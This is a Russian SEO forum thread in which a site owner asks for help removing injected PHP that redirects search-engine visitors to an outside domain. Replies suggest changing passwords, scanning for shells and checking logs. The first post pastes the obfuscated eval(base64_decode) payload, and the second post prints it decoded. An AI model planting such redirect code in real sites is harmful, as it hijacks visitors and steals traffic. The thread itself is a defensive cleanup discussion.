Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Безопасность

Важная информация
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности.

Ответ
 
Опции темы Оценить тему Опции просмотра
Старый 11.12.2012, 13:44   #1
 
Аватар для Hohol36g
 
Сообщений: 17
FR (активность): 627

Доп. информация
Вопрос Автор темы eval(base64_decode - замучал он меня!)

Сайт www.monti-sib.ru
В общем история такая.. примерно неделю назад обнаружил резкий спад посетителей. начал через запросы в яндексе пытаться заходить на сайт... а фиг там... начало выкидывать на сайти типа dubstep.dubstep.com и тд... Скопировал полностью сайт, вычистил... залил обратно) все вроде отлично первый день.. на утро таже история.. в общем борюсь 6 дей с этим кодом и победить не могу... подскажите плиз чем с ним справиться.
Код вида: eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ okcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxt KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXT sNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0K aWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFID cuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsK aWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaX N0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVy ZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2 dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9y IHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0ci gkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVy LCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW 4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBv bi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKS BvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9y IHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD 8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibX lzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNl Ym9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY2 9tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUi KSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZW FkZXIoIkxvY2F0aW9uOiBodHRwOi8vZHVic3RlcC5kdW1iMS5j b20vIik7DQpleGl0Код вида: eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ okcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxt KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXT sNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0K aWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFID cuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsK aWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaX N0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVy ZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2 dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9y IHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0ci gkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVy LCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW 4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBv bi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKS BvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9y IHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD 8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibX lzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNl Ym9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY2 9tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUi KSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZW FkZXIoIkxvY2F0aW9uOiBodHRwOi8vZHVic3RlcC5kdW1iMS5j b20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));
Hohol36g вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.12.2012, 13:56   #2
 
Аватар для cthulchu
 
Сообщений: 3,708
FR (активность): 120,615

Доп. информация
По умолчанию

[php]error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"-------") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dubstep.dumb1.com/");
exitz????
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"-------") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dubstep.dumb1.com/");
exit();
}
}
}
}
}[/php]

чтобы справиться - попросите профессионалов убрать шеллы и уязвимости. советую rdot.org
cthulchu вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.12.2012, 15:11   #3
 
Аватар для gunya
 
Сообщений: 144
FR (активность): 2,529

Доп. информация
По умолчанию

Цитата:
Сообщение от Hohol36g Посмотреть сообщение
все вроде отлично первый день.. на утро таже история
Поменяй везде пароли на хостинг. Всего вероятнее украли твой пароль и через фтп меняют фаилы. У мну так было. Поменял пароль - все ок.
gunya вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 22.12.2012, 13:26   #4
 
Аватар для hurt
 
Сообщений: 359
FR (активность): 11,770

Доп. информация
По умолчанию

ну да присоединюсь к прежним ответам, может еще платонам имеет смысл пописать мол вот машенничество, уроды тырят трафик, а без eval в системе не обойтись?
hurt вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 14.01.2013, 10:40   #5
 
Аватар для _SG_
 
Сообщений: 1
FR (активность): 0

Доп. информация
По умолчанию

Цитата:
Сообщение от gunya Посмотреть сообщение
Поменяй везде пароли на хостинг. Всего вероятнее украли твой пароль и через фтп меняют фаилы. У мну так было. Поменял пароль - все ок.
более вероятна уязвимость в движке, хотя и то что угнали пароли тоже не исключено.

тс, скань хост шеллы и скрипты с функциями эвал и подобными, также посмотри какие запросы шли к сайту (если сервер ведет лог) он тебе покажет уязвимое место, если его ломали.
_SG_ вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 21.01.2013, 16:46   #6
 
Аватар для htraceR12
 
Сообщений: 2
FR (активность): 10

Доп. информация
По умолчанию

ТС, сайт самопис иди движок? сам не могу глянуть так как антивир не пускает
htraceR12 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 21.01.2013, 20:11   #7
 
Аватар для Wardal
 
Сообщений: 432
FR (активность): 18,702

Доп. информация
По умолчанию

ТС, если надо, смогу заняться и помочь с вашей проблемой.
ПС: по самой ситуации вам выше правильно написали.
Wardal вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Ответ

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 3408 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
У меня -24 а у вас? Canny Беседка 25 27.02.2012 13:03
Не могу вставлять, т.к. у меня 0 сообщений, а у меня их больше Ясен Перец Мусорка 19 25.01.2012 07:03
что у меня с админкой? ZOL.A Разработка сайтов 5 06.03.2011 10:18

Текущее время: 22:56. Часовой пояс GMT +3.